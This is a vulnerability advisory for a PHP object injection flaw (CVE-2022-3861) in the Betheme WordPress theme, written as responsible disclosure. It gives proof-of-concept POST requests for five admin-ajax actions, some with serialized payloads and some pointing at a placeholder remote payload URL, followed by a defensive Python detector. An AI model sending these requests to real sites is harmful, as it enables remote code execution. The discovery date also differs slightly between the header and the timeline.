ADVISORY INFORMATION

  • Product: Betheme
  • Vendor URL: https://muffingroup.com/betheme
  • Type: Deserialization of Untrusted Data [CWE-502]
  • Date found: 2022-11-02
  • Date published: 2022-11-18
  • CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • CVE: CVE-2022-3861

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Betheme 26.5.1.4 and below

INTRODUCTION

Ever since Betheme was just an idea, we knew that it would be different from all other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could easily adapt to any project you need to work on without writing any code. A theme designed from scratch to save your time & help you enjoy your freedom…

(from the vendor’s homepage)

VULNERABILITY DETAILS

The WordPress theme is vulnerable to multiple PHP object injection flaws when processing input to several privileged WordPress ajax routes:

  • mfn_builder_import -> “mfn-items-import” parameter
  • mfn_builder_import_page -> “mfn-items-import-page” parameter
  • importdata -> “import” parameter
  • importsinglepage -> “import” parameter
  • importfromclipboard -> “import” parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at least WordPress “Contributor” rights.

Successful exploits can allow the attacker to execute arbitrary code.

PROOF OF CONCEPT

To exploit the “mfn_builder_import” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “mfn_builder_import_page” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the “importdata” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “importsinglepage” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the “importfromclipboard” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=
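
As an added defender-side example that is not part of this advisory, the following Python helper inspects POST bodies sent to /wp-admin/admin-ajax.php for the five actions listed above and flags a serialized PHP object (base64-wrapped as in the PoC, or raw) or a remote URL in the parameter each action deserializes. The action-to-parameter table is taken from the advisory; the constant and function names and the sample bodies are assumptions made here.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# The five admin-ajax.php actions named in the advisory and the parameter
# each one deserializes (CVE-2022-3861, Betheme 26.5.1.4 and below).
UNSAFE_ACTION_PARAMS = {
    "mfn_builder_import": "mfn-items-import",
    "mfn_builder_import_page": "mfn-items-import-page",
    "importdata": "import",
    "importsinglepage": "import",
    "importfromclipboard": "import",
}

# A PHP serialized object starts with O:<len>:"<class>": (C: for the
# Serializable form); scalars and arrays never do.
PHP_OBJECT_RE = re.compile(rb'(?:^|[;{])[OC]:\d+:"([^"]+)":')

# Constructed sample: the advisory's first PoC body (nonce placeholder kept).
POC_BODY = ("mfn-builder-nonce=[your-nonce]&action=mfn_builder_import"
            "&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=")


def decode_import_value(value: str) -> bytes:
    """Undo the base64 layer the PoC uses; fall back to the raw bytes so a
    payload sent without base64 is still inspected."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return value.encode("utf-8", "surrogateescape")


def inspect_ajax_body(body: str) -> list:
    """Inspect one admin-ajax.php POST body (form-urlencoded).
    Returns finding strings; an empty list means no vulnerable action is hit."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    param = UNSAFE_ACTION_PARAMS.get(action)
    if param is None:
        return []
    findings = []
    for value in params.get(param, []):
        if re.match(r"https?://", value, re.I):
            # Remote variant: the PoC supplies a URL that serves the payload.
            findings.append(f"{action}: {param} points at remote content {value}")
            continue
        match = PHP_OBJECT_RE.search(decode_import_value(value))
        if match:
            cls = match.group(1).decode("ascii", "replace")
            findings.append(f"{action}: {param} carries serialized PHP object of class {cls}")
    if not findings:
        # The bare action is still worth logging: it is reachable by Contributors.
        findings.append(f"{action}: vulnerable import action invoked")
    return findings
```

Run it over request bodies captured from the web server (url-encoded, so a `+` inside base64 arrives as `%2B`) to spot this pattern in access or WAF logs.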

SOLUTION

Update to version 26.6

REPORT TIMELINE

  • 2022-11-01: Discovery of the vulnerability
  • 2022-11-03: CVE requested from Wordfence (CNA)
  • 2022-11-04: Wordfence assigns CVE-2022-3861
  • 2022-11-08: Vendor notification
  • 2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn’t respond
  • 2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability
  • 2022-11-18: Public disclosure

REFERENCES

None